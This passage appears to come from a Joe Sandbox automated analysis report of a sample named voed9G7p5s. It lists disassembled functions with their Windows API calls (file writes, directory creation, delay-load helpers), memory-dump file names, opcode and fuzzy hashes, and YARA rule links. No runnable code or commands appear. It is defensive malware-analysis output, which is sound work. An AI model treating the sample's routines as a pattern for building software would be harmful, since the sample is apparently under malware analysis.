                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: 2$PDu<
                                                                                                    • API String ID: 1269201914-683690134
                                                                                                    • Opcode ID: 520217d994cfc0cf0500c704b8f44b3c6d9689db008bef1064b01ce1310022dc
                                                                                                    • Instruction ID: 2fba59fa9fe11bfbda55e5afd79302d6d18944aa11756d38ae28cc8af4234724
                                                                                                    • Opcode Fuzzy Hash: 520217d994cfc0cf0500c704b8f44b3c6d9689db008bef1064b01ce1310022dc
                                                                                                    • Instruction Fuzzy Hash: 80B012E129D1007D314852182C07DBB054EC4C1F20330702EFC04F0680E8804C850631
                                                                                                    Function 00E09F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00E0D343,00000001,?,?,?,00000000,00E1551D,?,?,?), ref: 00E09F9E
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00E1551D,?,?,?,?,?,00E14FC7,?), ref: 00E09FE5
                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00E0D343,00000001,?,?), ref: 00E0A011
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$Handle
                                                                                                    • String ID:
                                                                                                    • API String ID: 4209713984-0
                                                                                                    • Opcode ID: ce482b15b1cb429e49d9c2a7ef20256dff59f36225a3702aa9a005339a795794
                                                                                                    • Instruction ID: ec1ec458ac572e64f050aef16783072de3dc5a2ce1a80cf9b3bd9bdee818ade1
                                                                                                    • Opcode Fuzzy Hash: ce482b15b1cb429e49d9c2a7ef20256dff59f36225a3702aa9a005339a795794
                                                                                                    • Instruction Fuzzy Hash: 3D31A27120830AAFDB14CF20D818BBE77A5EF94715F045529F981BB2D1C7759D88CBA2
                                                                                                    Function 00E0A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0C27E: _wcslen.LIBCMT ref: 00E0C284
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A2D9
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A30C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A329
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2260680371-0
                                                                                                    • Opcode ID: 87c440dc2321500e01cb6e372f7fa2ec33cf490f0605e2fc418d00d649a8d1ac
                                                                                                    • Instruction ID: 78f9f0ec172a58eebe26235fa87734d1a79dd920d371cadd8e1970ab197182b8
                                                                                                    • Opcode Fuzzy Hash: 87c440dc2321500e01cb6e372f7fa2ec33cf490f0605e2fc418d00d649a8d1ac
                                                                                                    • Instruction Fuzzy Hash: 2F01B53560031C6AEF21AB758C0ABED36889F09784F0C5474F901F60D1D758DAC186B6
                                                                                                    Function 00E2B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E2B8B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                    • Opcode ID: c19e30ecd1cfd70eaaeff5960bc9bbc2b125c6c16f969220ca609859580e1d8e
                                                                                                    • Instruction ID: b3556f9593a62bd1c48c3322b1886471920becaf08b0ac23b385d6d2ec95d523
                                                                                                    • Opcode Fuzzy Hash: c19e30ecd1cfd70eaaeff5960bc9bbc2b125c6c16f969220ca609859580e1d8e
                                                                                                    • Instruction Fuzzy Hash: 1E412A7090426C9EDF258E28DC84BF6BBF9EB45308F1414EDE59AA6142D3359A85CF60
                                                                                                    Function 00E2AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00E2AFDD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                    • Opcode ID: 44d12791518e94d04bafb58d8e05b31071eb5471d02383b1fa63f7430fc3bc82
                                                                                                    • Instruction ID: c51dab29f90214945fcba43622dfdf61eb620c66ba5e5935be455aea262d4656
                                                                                                    • Opcode Fuzzy Hash: 44d12791518e94d04bafb58d8e05b31071eb5471d02383b1fa63f7430fc3bc82
                                                                                                    • Instruction Fuzzy Hash: A501177260421EBBCF129F91ED06DEE7FA2EB48750F054254FE1475160C6368931EB81
                                                                                                    Function 00E2AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E2A56F), ref: 00E2AF55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                    • Opcode ID: c611a26cbd24f54bdc14056935c3819ee9e651288ccb528b726b64253be9aefa
                                                                                                    • Instruction ID: 183e8777e42a5757f5af3d7d249a68ee9b6304caabc2cbce9cfa2922dea952a1
                                                                                                    • Opcode Fuzzy Hash: c611a26cbd24f54bdc14056935c3819ee9e651288ccb528b726b64253be9aefa
                                                                                                    • Instruction Fuzzy Hash: 2DF0B47164921CBFCB215F65DC0ADAEBFA1EF44711F014165FD0876260DA314A10E785
                                                                                                    Function 00E2ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc
                                                                                                    • String ID: FlsAlloc
                                                                                                    • API String ID: 2773662609-671089009
                                                                                                    • Opcode ID: 51c018ffa48a816165b856ac8ee6aba35a4672739fc88731187f8461f196c93f
                                                                                                    • Instruction ID: c69a9eea4ae54c6c9c2cab317c3be4af381201dfaa470db0f708b39e0a5693af
                                                                                                    • Opcode Fuzzy Hash: 51c018ffa48a816165b856ac8ee6aba35a4672739fc88731187f8461f196c93f
                                                                                                    • Instruction Fuzzy Hash: ABE0E57164532C7BC721AB6AEC0AE6EBF94EB44721F0612A9FC05B7350CD715E4086D6
                                                                                                    Function 00E1E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 1b57adef94b7742becaeea969cb6e4c5c8675e7862fe412ddaa41b80af192ec0
                                                                                                    • Instruction ID: 4f7a06c21ee78c78edeed93754cf35c15fc222aee765de995bae4de79640a273
                                                                                                    • Opcode Fuzzy Hash: 1b57adef94b7742becaeea969cb6e4c5c8675e7862fe412ddaa41b80af192ec0
                                                                                                    • Instruction Fuzzy Hash: CDB012F539E200BC310851692C0BCF7014CE4C2B10330703EFC06F0281D840AC810631
                                                                                                    Function 00E1E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 87e904d241d0dc461bd02db94c0847c5afd88b77f1fe63c2739447d753360ef1
                                                                                                    • Instruction ID: 42b8e53bd812aa6e9d3c6931724739ab0074297b3ea976400ac1c05344efd680
                                                                                                    • Opcode Fuzzy Hash: 87e904d241d0dc461bd02db94c0847c5afd88b77f1fe63c2739447d753360ef1
                                                                                                    • Instruction Fuzzy Hash: 0DB012F139A100BC310856252C0BCF7014CD4C2B20330F13EFC06F0381D840EC850531
                                                                                                    Function 00E1E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: dde305104fba81cbd20307aea2ef5467c041b1de310ba9255a1ab38b7efc2d0a
                                                                                                    • Instruction ID: f2dc236f5bd2efc6b1338cb1b4a89ad90a03d494f2d32157fbd1ae82b99bbf62
                                                                                                    • Opcode Fuzzy Hash: dde305104fba81cbd20307aea2ef5467c041b1de310ba9255a1ab38b7efc2d0a
                                                                                                    • Instruction Fuzzy Hash: 28B012F539A200BC310811652C0BCF7010CD4C3B10330B43EFC02F0581D840EC810431
                                                                                                    Function 00E1EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1EAF9
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: 3Ro
                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                    • Opcode ID: 3f32f5c5598230a6cd7c812e0220b0bfc3b86893c1481c236dfacf508a8fe199
                                                                                                    • Instruction ID: b33a577b0ba359fef881318291db26ddc7aa38b6054e8f122af9969afaa12374
                                                                                                    • Opcode Fuzzy Hash: 3f32f5c5598230a6cd7c812e0220b0bfc3b86893c1481c236dfacf508a8fe199
                                                                                                    • Instruction Fuzzy Hash: 75B092E629A1427C310862102907CBA4148C8D1F90330B12AB800B4181988158860431
                                                                                                    Function 00E1E2B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
